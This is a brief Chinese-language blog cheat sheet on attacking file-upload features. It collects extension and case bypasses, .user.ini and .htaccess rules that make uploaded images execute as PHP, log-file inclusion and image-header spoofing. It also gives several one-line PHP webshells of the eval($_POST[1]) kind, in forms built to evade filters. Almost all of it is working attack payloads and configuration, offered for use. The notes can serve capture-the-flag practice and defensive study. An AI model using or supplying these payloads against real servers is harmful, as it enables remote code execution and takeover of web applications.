文件上传(简陋的笔记)

后缀:php, php3, php4, php5, phtml, .asp ,pHP(大小写绕过)
双写绕过:pphphp
配置文件:.user.ini      .htaccess

.user.ini :(上传点 要有 index.php)
1、auto_prepend_file=‘/var/log/nginx/access.log’ (log被过滤 => l"."og 绕过过滤)

2、auto_prepend_file=1.png

.htaccess
1、 AddType application/x-httpd-php .png (将png后缀的文件当做php文件执行,png => jpg,gif 等)

2 、 ( 将 1.jpg 中的内容当作php代码执行 )
<FilesMatch "1.jpg"> SetHandler application/x-httpd-php </FilesMatch>

一句话木马:( {} 可代替 [] )
<?php eval($_POST[1]);?>
<?=eval($_POST[1]);?> (过滤了php)
<?php eval(phpinfo());?>

<script language='php'>@eval($_POST[1])</script> (过滤了? )

GIF89a 绕过图像文件头检查

Content-Type: application/x-www-form-urlencoded
一般改成    Content-Type:image/png 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值